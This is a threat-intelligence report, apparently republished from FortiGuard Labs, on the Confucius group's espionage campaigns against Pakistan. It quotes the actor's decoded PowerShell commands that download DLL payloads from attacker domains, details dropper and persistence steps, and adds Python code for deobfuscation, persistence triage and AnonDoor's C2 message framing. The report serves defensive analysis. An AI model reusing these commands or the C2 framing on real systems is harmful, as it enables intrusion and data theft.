The Confucius group is a long-running cyber-espionage actor operating primarily across South Asia. First identified in 2013, the group is believed to have links to state-sponsored operations in the region. Over the past decade, Confucius has repeatedly targeted government agencies, military organizations, defense contractors, and critical industries, especially in Pakistan, using spear-phishing and malicious documents as initial access vectors. Recent campaigns have highlighted a sharp evolution in tactics, shifting from document stealers like WooperStealer to Python-based backdoors such as AnonDoor. This progression underscores Confucius’ adaptability and the growing sophistication of state-aligned malware campaigns in the region.
Over the past several months, our friends at FortiGuard Labs have observed Confucius evolving its tradecraft, leveraging weaponized Office documents, malicious LNK files, and multiple malware families, including custom Python RATs and advanced stealers. The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities. Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness. In this article, Fortinet will provide a chronological walkthrough of Confucius’ recent activity.
Figure 1: Confucius' activities
December 2024 – Document.ppsx Infection Chain
This phishing email campaign targeted users in Pakistan. The message relied on authority spoofing, minimal context, and an action-oriented request to entice the recipient into opening the attachment and kick off the infection chain.
Once Document.ppsx was opened, it displayed a "Corrupted Page" message. In the background, an embedded OLE object referenced from slide1.xml.rels fetched and ran a script from the remote host greenxeonsr.info.
The fetched mango44NX.doc file is actually a VBScript: a compact dropper with persistence and execution staging. It first downloads a remote payload from hxxps://greenxeonsr[.]info/Jsdfwejhrg.rko via MSXML2.XMLHTTP, writes the raw response bytes to %LocalAppData%\Mapistub.dll through an ADODB.Stream, and closes the stream.
It then copies C:\Windows\System32\fixmapi.exe into %AppData% as Swom.exe and writes a registry string value under HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load that points to it for persistence. The load value is a legacy Win.ini-era entry that Windows still executes at user logon, so the renamed fixmapi.exe copy runs each time the user signs in.
Finally, it uses a Shell.Application COM object, whose ProgID string it reconstructs at runtime, to launch Swom.exe; the legitimate fixmapi.exe copy then side-loads the malicious Mapistub.dll.
Figure 5: Registry setting
The malicious DLL Mapistub.dll prepared two remote addresses (cornfieldblue[.]info and hauntedfishtree[.]info) for the next stage of stealer activity.
After downloading the data, it loads the downloaded payload and invokes the hard-coded method name Yretisdkjhsfkjfh.
Analysis revealed that the final-stage payload was WooperStealer, identifiable by the stringToEscape variable Class1.Wooper. This stealer was configured to collect a wide range of file types with specific extensions: .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .doc, .DOC, .xls, .XLS, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM, .jpeg, .JPEG, .eml, .EML, .pst, .PST, .ZIP, .zip, .RAR, .rar. The duplicated upper- and lower-case entries suggest the extension comparison is case-sensitive. It enumerates the drives of the compromised system with Directory.GetLogicalDrives and uploads stolen data to the remote URL hxxp://marshmellowflowerscar[.]info.
Figure 8: WooperStealer
2025 March – Invoice_Jan25.pdf.lnk Infection Chain
By early 2025, the Confucius group had shifted to using malicious LNK files in its campaigns. Researchers obtained a sample whose embedded machine ID is desktop-1tjntib. The LNK staged a legitimate executable, BlueAle.exe, copied from C:\Windows\System32\fixmapi.exe, and downloaded a malicious DLL and a decoy PDF from the remote server petricgreen.info.
The decoded $x command is:
curl -o ($pa + '\mapistub.dll') "hxxps://petricgreen[.]info/RPXFD38WAPR7.rko";$j=$env:TMP + '\file.pdf'; curl -o $j "hxxps://petricgreen[.]info/BWN9ZAP.rko";
The malicious DLL, mapistub.dll, copied targeted files into C:\Windows\Tasks and established persistence by adding registry entries.
The DLL embedded two Base64-encoded strings, representing remote hosts for the final payload. Once the additional data was downloaded, the DLL invoked it using the same hard-coded method observed in earlier activity.
The final payload was again identified as WooperStealer, this time with minor modifications to its target list of file extensions: .zip, .rar, .eml, .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .DOC, .doc, .XLS, .xls, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM, .jpeg, .JPEG.
Figure 12: Targeted directory list
Figure 13 shows the familiar stringToEscape variable Class1.Wooper, solidifying attribution to WooperStealer.
WooperStealer uploads stolen files with POST requests carrying three parameters: value1 holds the victim's system identifier (<SerialNumber>_<ComputerName>_<UserName>), value2 the file path, and value3 the file hash. The hash lets the server recognize files it has already received, so the same file is not uploaded multiple times.
Figure 14: Uploaded stolen file
Figure 15: Transmitting the hash of the stolen file
Based on the telemetry gathered by researchers, this attack targets users in Pakistan.
Figure 16: Telemetry
2025 August – New Python Backdoor
In August, analysts observed another malicious LNK file, NLC.pdf.lnk, that leveraged a similar execution technique but introduced new payloads. The decoded command in the $x variable revealed the following activity:
curl -o ($pa + '\python313.dll') "bloomwpp.info/KM9XFY.kut";curl -o $c "bloomwpp.info/WTBXX46.kut";$j=$env:TMP + '\file.pdf'; curl -o $j "bloomwpp.info/JRC89.kut";
The LNK's PowerShell command stores the script as a long numeric array that is piped through %{[char]($_-217)} to reconstruct the script text, which is then executed with IEX. Because this runs under Windows PowerShell, curl here is the built-in alias for Invoke-WebRequest and -o resolves to its -OutFile parameter. The script fetches data from bloomwpp.info and writes it to %LocalAppData% as python313.dll and BlueAle.exe, along with a temporary PDF named file.pdf. The PDF is opened immediately to distract the user while BlueAle.exe performs DLL side-loading to invoke the malicious python313.dll.
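The char-array obfuscation used in both LNK chains is mechanical enough to strip automatically during triage. The following Python is an added example written for this article, not Fortinet's tooling or the actor's code: it finds every `<ints>|%{[char]($_-N)}` block in a PowerShell command line (also the ForEach-Object spelling and a "+" offset), recovers the offset from the block itself rather than assuming 217, and returns the decoded scripts. The sample command line, the example.invalid URL and the encoder used to build that sample are constructed for illustration.

```python
import re

# One ForEach-Object block of the form "<ints>|%{[char]($_-217)}" (or the long
# alias ForEach-Object, or "+" instead of "-").  At least four integers are
# required so ordinary short numeric lists in a script are not matched.
CHAR_ARRAY_RE = re.compile(
    r"\(?(?P<arr>\d+(?:\s*,\s*\d+){3,})\)?"
    r"\s*\|\s*(?:%|ForEach-Object)\s*\{\s*\[char\]\s*\(\s*\$_\s*(?P<op>[-+])\s*(?P<off>\d+)\s*\)\s*\}",
    re.IGNORECASE,
)


def decode_char_array(numbers, offset, op="-"):
    """Apply the per-element arithmetic and cast to characters, exactly as the
    %{[char]($_-N)} block does when PowerShell evaluates it."""
    delta = -offset if op == "-" else offset
    return "".join(chr(n + delta) for n in numbers)


def extract_encoded_scripts(powershell):
    """Return every script recovered from char-array blocks in a command line.
    A loader may chain several arrays, so a list is returned (empty if none)."""
    decoded = []
    for m in CHAR_ARRAY_RE.finditer(powershell):
        numbers = [int(tok) for tok in m.group("arr").split(",")]
        decoded.append(decode_char_array(numbers, int(m.group("off")), m.group("op")))
    return decoded


def encode_char_array(text, offset=217):
    """Produce the obfuscated form; used here only to build the constructed sample."""
    body = ",".join(str(ord(ch) + offset) for ch in text)
    return f"({body})|%{{[char]($_-{offset})}}"


# Constructed sample: what a decoded $x might look like, and an LNK argument
# string wrapping it the way the page describes (assign to $x, then IEX).
SAMPLE_SCRIPT = 'curl -o $j "https://example.invalid/decoy.rko"; Start-Process $j'
SAMPLE_LNK_ARGS = f'-w hidden -c "$x={encode_char_array(SAMPLE_SCRIPT)};IEX $x"'

if __name__ == "__main__":
    for script in extract_encoded_scripts(SAMPLE_LNK_ARGS):
        print(script)
```

Feed it the Arguments string extracted from an LNK (for instance with a LNK parser that exposes the command-line arguments); the decoded text is what you would otherwise obtain by running the loader, without executing it.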
Unlike previous campaigns that deployed WooperStealer, python313.dll sets up an execution environment for a new Python-based backdoor. It first creates a temporary PowerShell script at %TEMP%\_CL_cb7565c393993c050319426106747613in.ps1, downloaded from hxxps://bloomwpp[.]info/hjopjhfgda.ps1, which installs Scoop and configures the environment variables required to ensure Python code can execute without errors.
Figure 18: MSIL downloader
Figure 19: Preparing the Python execution path
It then constructs a remote URL, hxxps://bloomwpp[.]info/hjdfyebvghu[.]pyc, downloads the raw bytes via a GetByteArrayAsync call that it waits on synchronously, and writes the received bytes to a file named winresume.pyc under the current user's %LOCALAPPDATA% directory. After writing the file, it marks it hidden with FileAttributes.Hidden.
Figure 20: Entry point
It constructs the target file path %LOCALAPPDATA%\winresume.pyc and creates a scheduled task named NetPolicyUpdate that runs pythonw.exe from the Scoop installation set up by the earlier PowerShell script (%USERPROFILE%\scoop\apps\python\current\pythonw.exe) with the .pyc as its argument every 5 minutes. The task replaces the registry-based persistence used in earlier campaigns, and because pythonw.exe opens no console window the backdoor runs without any visible window.
Figure 21: Persistence setting preparation
Figure 22: Scheduled task
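Both persistence mechanisms on this page, the Windows\load registry value from the December 2024 chain and the NetPolicyUpdate scheduled task above, can be triaged from collected artifacts. The following Python is an added example written for this article, not Fortinet's code and not part of the malware: assess_load_value takes the string read from the load value, and assess_task_xml takes a task definition as exported by schtasks /query /tn <name> /xml (read that file in binary mode so ElementTree honours its UTF-16 declaration). The sample task XML, the victim paths, and the 10-minute interval threshold are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Namespace of Task Scheduler XML (what schtasks /query /xml and Export-ScheduledTask emit).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Path fragments that indicate a user-writable location (matched on lower-cased paths).
USER_WRITABLE = ("\\appdata\\", "%appdata%", "%localappdata%", "%temp%",
                 "\\users\\public\\", "\\programdata\\", "\\temp\\")


def assess_load_value(load_value):
    """Triage HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load.
    Returns the reasons it resembles the renamed-fixmapi persistence the VBScript
    dropper installs; an empty list means nothing to report."""
    if not load_value or not load_value.strip():
        return []                      # value absent or empty: the normal state
    target = load_value.strip().strip('"').lower()
    reasons = ["load value is set (legitimate software almost never uses it)"]
    if any(frag in target for frag in USER_WRITABLE):
        reasons.append("target is in a user-writable profile directory")
    if not target.startswith(("c:\\windows\\", "c:\\program files")):
        reasons.append("target is outside Windows and Program Files")
    return reasons


def iso_duration_minutes(duration):
    """Convert the ISO-8601 durations Task Scheduler uses (PT5M, P1DT2H, ...) to
    minutes; None when the value is missing or not in that form."""
    if not duration:
        return None
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", duration.strip())
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def assess_task_xml(xml_text, max_interval_minutes=10):
    """Triage one exported task definition against the NetPolicyUpdate pattern: a
    per-user Python interpreter running a .pyc from the profile on a short
    repetition interval, optionally hidden.  Returns human-readable findings."""
    root = ET.fromstring(xml_text)
    findings = []
    for action in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = action.findtext("t:Command", default="", namespaces=TASK_NS).strip().lower()
        args = action.findtext("t:Arguments", default="", namespaces=TASK_NS).strip().lower()
        if cmd.endswith(("pythonw.exe", "python.exe")):
            findings.append("action runs a Python interpreter: " + cmd)
        if "\\scoop\\" in cmd:
            findings.append("interpreter lives under a per-user Scoop install")
        if re.search(r"\.pyc\b", args):
            findings.append("argument is a compiled .pyc: " + args)
        if any(frag in args for frag in USER_WRITABLE):
            findings.append("script argument is in a user-writable directory")
    for interval in root.findall(".//t:Triggers//t:Repetition/t:Interval", TASK_NS):
        minutes = iso_duration_minutes(interval.text)
        if minutes is not None and minutes <= max_interval_minutes:
            findings.append(f"repeats every {minutes:g} minute(s)")
    if root.findtext(".//t:Settings/t:Hidden", default="", namespaces=TASK_NS).strip().lower() == "true":
        findings.append("task is marked hidden")
    return findings


# Constructed sample modelled on the task described above (no XML declaration so
# it parses as a str; real exports carry a UTF-16 declaration).
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT5M</Interval></Repetition>
    <StartBoundary>2025-08-01T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>C:\\Users\\victim\\scoop\\apps\\python\\current\\pythonw.exe</Command>
    <Arguments>C:\\Users\\victim\\AppData\\Local\\winresume.pyc</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed benign task for comparison: a daily system binary with no arguments.
BENIGN_TASK_XML = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\\Windows\\System32\\cleanmgr.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(assess_load_value(r"C:\Users\victim\AppData\Roaming\Swom.exe"))
    print(assess_task_xml(SAMPLE_TASK_XML))
    print(assess_task_xml(BENIGN_TASK_XML))
```

The task checks are deliberately independent of the task name and the .pyc name, both of which the actor can change between campaigns; the combination of a profile-local interpreter, a compiled script in the profile, and a minute-scale repetition interval is what survives renaming.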
The PYC file winresume.pyc serves as a backdoor that collects system information, contacts its C2 server, and receives commands for further action.
Figure 23: PYC version of AnonDoor
The following analysis is based on the disassembly code from the PYC file.
Figure 24: Disassembly code of the PYC file
AnonDoor writes a timestamp to %TEMP%\wctDD1A.tmp and checks it on each run so that its heavier tasks execute at most once every 6 minutes on a host. That reduces noise, avoids redundant exfiltration, and keeps its timing controlled.
Figure 25: TEMP file to track execution time
It runs a compact fingerprinting routine that quietly profiles the host and its network before performing any noisy actions. It derives the local egress IP and grabs the hostname and logged-in user. It then fingerprints the OS with platform.platform(). For external context, it queries several public IP echo services in sequence (api.ipify.org, ipinfo.io/ip, icanhazip.com, and ifconfig.me/ip). Once it has a public IP, it geo-locates the country via ip-api.com and ipwhois.app. To uniquely tag hardware, it executes a hidden wmic csproduct get uuid command.
Figure 26: Get system information
AnonDoor consolidates the collected system information into the parameter uhhg using $!!$ as a delimiter between fields. The resulting data is transmitted to the C2 server, where access and retrieval appear to be restricted to specific geographic targets such as Pakistan. The overall packet structure closely mirrors that of the earlier MSIL-based AnonDoor backdoor, underscoring Confucius’ recent transition toward deploying a Python-based variant of AnonDoor.
Figure 27: C2 server information
Figure 28: C2 connection
It uses the Windows API GetDiskFreeSpaceExW to quietly inventory local storage: it walks drive letters A:\ through Z:\, checks which paths exist, and calls GetDiskFreeSpaceExW for each live volume. It converts bytes to GiB by integer division by 1,073,741,824 (2^30), emits compact entries like C:476GB/ Free-120GB, joins all volume entries, and sends them to the C2 server in the parameter fhgfh.
Figure 29: Get the system's volume information
AnonDoor then contacts its C2 server with the parameter cuud to request further tasks. If the reply is anything other than the string Somethingworng1, it immediately sends a POST back with sout=<ID>@$$@<raw_task_data>, splits the task data on #$$, and dispatches on the task name. Supported commands include CmdExecution, Screenshoot, fileListing, DownloadFile, Directory_listing, FolderDownload, basicinfo, and PasswordDumper. For some tasks, AnonDoor downloads an additional Python module from the URL carried in <raw_task_data> and executes it.
Figure 30: Constructing a packet for a C2 command
Figure 31: Handling the C2 command
Take the Screenshoot command, for example. AnonDoor receives the module URL hxxps://bloomwpp[.]info/DubjW967VGHD3ykdnhkdhn/dsdcrjhdeenidufoft.py, which is used to capture the victim’s screen. It then builds PNG data of the screenshot into the format of <uuid>!$$$!Screenshoot!$$$!<command>###<module_url>!$$$!<ID>!$$$!<PNG_base64>. It then encodes the entire data with Base64 and sends it back to the C2 server with the parameter SCtat.
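To make the framing concrete, here is an added Python example, written for this article rather than taken from the backdoor, that builds and parses the messages described in the preceding sections: the uhhg system-information beacon joined with $!!$, the per-volume entries produced by integer GiB division, the cuud task reply with its Somethingworng1 sentinel and #$$ separators, the sout acknowledgement, and the doubly Base64-encoded Screenshoot result sent in SCtat. The parameter names and delimiters are those reported on the page; the field order of the beacon, the exact content of <command>, the example.invalid URLs and the PNG bytes are assumptions or constructed values. The decode function is the one you would use on captured traffic.

```python
import base64

# Delimiters and parameter names as recovered from the PYC disassembly.
FIELD_SEP = "$!!$"     # between fields of the system-information beacon (parameter uhhg)
TASK_SEP = "#$$"       # between fields of a task handed out by the C2 (parameter cuud)
RESULT_SEP = "!$$$!"   # between fields of a task result (parameter SCtat)
MODULE_SEP = "###"     # between the command string and the module URL inside a result
ACK_SEP = "@$$@"       # sout=<ID>@$$@<raw task data>
NO_TASK = "Somethingworng1"
GIB = 1024 ** 3        # 1,073,741,824; the backdoor uses integer division


def format_volume(letter, total_bytes, free_bytes):
    """One per-volume entry, e.g. 'C:476GB/ Free-120GB'.  Integer division by
    2**30 means the label says GB but the unit is really GiB, rounded down."""
    return f"{letter}:{total_bytes // GIB}GB/ Free-{free_bytes // GIB}GB"


def build_sysinfo(fields):
    """Join the fingerprint fields into the uhhg value (field order is assumed)."""
    return FIELD_SEP.join(fields)


def parse_sysinfo(blob):
    return blob.split(FIELD_SEP)


def parse_task(raw_reply):
    """Return (task_name, remaining fields), or None for the no-task sentinel."""
    if raw_reply == NO_TASK:
        return None
    parts = raw_reply.split(TASK_SEP)
    return parts[0], parts[1:]


def build_task_ack(task_id, raw_task):
    """The immediate POST the backdoor sends back after receiving a task."""
    return {"sout": f"{task_id}{ACK_SEP}{raw_task}"}


def build_screenshot_result(uuid, command, module_url, task_id, png_bytes):
    """<uuid>!$$$!Screenshoot!$$$!<command>###<module_url>!$$$!<ID>!$$$!<PNG_base64>,
    then the whole string Base64-encoded again and sent as SCtat."""
    inner = RESULT_SEP.join([
        uuid, "Screenshoot", f"{command}{MODULE_SEP}{module_url}", task_id,
        base64.b64encode(png_bytes).decode(),
    ])
    return {"SCtat": base64.b64encode(inner.encode()).decode()}


def decode_screenshot_result(sctat_value):
    """Inverse of build_screenshot_result, for SCtat values pulled from captured
    traffic.  Base64 never contains '!' or '$', so the split is unambiguous."""
    inner = base64.b64decode(sctat_value).decode()
    uuid, task, cmd_mod, task_id, png_b64 = inner.split(RESULT_SEP)
    command, _, module_url = cmd_mod.partition(MODULE_SEP)
    return {"uuid": uuid, "task": task, "command": command, "module_url": module_url,
            "id": task_id, "png": base64.b64decode(png_b64)}


if __name__ == "__main__":
    # Constructed values; nothing here comes from a real infection.
    print(build_sysinfo(["203.0.113.7", "WIN-LAB01", "victim", "Windows-10-10.0.19045", "PK"]))
    print(format_volume("C", 476 * GIB + 5 * 2**20, 120 * GIB + 1))
    task = "Screenshoot#$$https://example.invalid/module.py"
    print(parse_task(task), build_task_ack("17", task))
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # PNG signature only, not a real image
    wire = build_screenshot_result("4c4c4544-0000-2010-8020-b4c04f4e4d31", "Screenshoot",
                                   "https://example.invalid/module.py", "17", png)
    print(decode_screenshot_result(wire["SCtat"])["module_url"])
```

The delimiter strings themselves are useful detection content: $!!$, #$$ and !$$$! appear in cleartext in the uhhg and cuud exchanges, and the SCtat value decodes to a string containing them after a single Base64 pass.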
Figure 32: Python module for Screenshoot
Figure 33: Python module for fileListing
For PasswordDumper, which we observed in September, the helper URLs are hard-coded in the PYC file. AnonDoor downloads both helpers from bloomwpp[.]info and caches their source in memory.
During execution, it chooses which helper to run based on the task's target: Fohjdfj783mq9XX.py handles Firefox and Fodkh3897mgfdjiuED.py handles Edge.
Figure 34: Dump of Firefox data
Figure 35: Dump of Edge data
Conclusion - Our analysis reveals how the Confucius group has continually evolved its techniques, adopting diverse file types as initial access vectors and chaining OLE objects, malicious scripts, LNK files, PowerShell loaders, MSIL downloaders, and heavily obfuscated payloads to evade detection. This campaign highlights the group’s technical agility, switching between malware families, including WooperStealer, the MSIL-based AnonDoor, and its Python-based variant.
The layered attack chain leverages encoded components, DLL side-loading, and scheduled task persistence to secure long-term access and exfiltrate sensitive data while minimizing visibility. As threat actors persistently refine their methods to bypass defenses, maintaining vigilance against varied attack techniques is critical. FortiGuard Labs will continue to closely monitor these evolving operations, providing users with timely and comprehensive protection.[1]
IOCs
Domain:
marshmellowflowerscar.info
greenxeonsr.info
cornfieldblue.info
hauntedfishtree.info
petricgreen.info
bloomwpp.info
dropmicis.info
martkartout.info
PPSX:
c91917ff2cc3b843cf9f65e5798cd2e668a93e09802daa50e55a842ba9e505de
LNK:
5a0dd2451a1661d12ab1e589124ff8ecd2c2ad55c8f35445ba9cf5e3215f977e
4206ab93ac9781c8367d8675292193625573c2aaacf8feeaddd5b0cc9136d2d1
DLL:
8603b9fa8a6886861571fd8400d96a705eb6258821c6ebc679476d1b92dcd09e
24b06b5caad5b09729ccaffa5a43352afd2da2c29c3675b17cae975b7d2a1e62
13ca36012dd66a7fa2f97d8a9577a7e71d8d41345ef65bf3d24ea5ebbb7c5ce1
PYC:
06b8f395fc6b4fda8d36482a4301a529c21c60c107cbe936e558aef9f56b84f6
11391799ae242609304ef71b0efb571f11ac412488ba69d6efc54557447d022f
This article is shared with permission at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://www.fortinet.com/blog/threat-research/confucius-espionage-from-stealer-to-backdoor/